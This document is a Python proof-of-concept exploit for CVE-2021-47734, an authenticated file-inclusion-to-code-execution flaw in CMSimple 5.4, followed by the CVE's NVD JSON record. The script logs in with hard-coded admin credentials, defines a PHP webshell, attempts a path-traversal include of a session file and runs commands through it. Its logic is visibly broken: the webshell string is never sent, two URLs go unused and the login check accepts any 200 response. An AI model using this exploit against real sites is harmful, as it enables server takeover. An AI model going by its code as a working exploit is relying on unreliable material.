CVE-2021-47734

import requests import re # CVE-2021-47734 PoC - CMSimple 5.4 Authenticated LFI to RCE # Target: CMSimple 5.4 # Requirements: Valid admin credentials TARGET_URL = "http://target.com/cmsimple/" USERNAME = "admin" PASSWORD = "admin123" session = requests.Session() # Step 1: Login to get authenticated session def login(): login_url = TARGET_URL + "?_loginaction=login" data = { "userid": USERNAME, "password": PASSWORD } response = session.post(login_url, data=data) return "logged_in" in response.text or response.status_code == 200 # Step 2: Upload malicious PHP code to session file def upload_shell(): # Find the file inclusion parameter upload_url = TARGET_URL + "?_sn=functions&_action=edit" # Inject PHP webshell via file path manipulation shell_code = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" # Step 3: Manipulate file path to include session file include_url = TARGET_URL + "?_sn=/tmp/sess_PHPSESSID" # Alternatively, use the vulnerable parameter directly exploit_params = { "_sn": "../../../tmp/sess_PHPSESSID", "_action": "include" } response = session.get(TARGET_URL, params=exploit_params) return response.text # Step 4: Execute commands via webshell def exec_command(cmd): shell_url = TARGET_URL + "?_sn=../../../tmp/sess_PHPSESSID&cmd=" + cmd response = session.get(shell_url) return response.text if __name__ == "__main__": if login(): print("[+] Login successful") print("[*] Uploading shell...") upload_shell() print("[*] Executing command: whoami") result = exec_command("whoami") print(f"[+] Result: {result}") else: print("[-] Login failed")

{"cve": {"id": "CVE-2021-47734", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:45.123", "lastModified": "2026-01-05T14:15:51.477", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "CMSimple 5.4 contains an authenticated local file inclusion vulnerability that allows remote attackers to manipulate PHP session files and execute arbitrary code. Attackers can leverage the vulnerability by changing the functions file path and uploading malicious PHP code through session file upload mechanisms."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cmsimple:cmsimple:5.4:*:*:*:*:*:*:*", "matchCriteriaId": "7AE7406C-886F-4F06-B668-90EB220AFA5C"}]}]}], "references": [{"url": "https://www.cmsimple.org/en/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50547", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/cmsimple-authenticated-local-file-inclusion-remote-code-execution", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}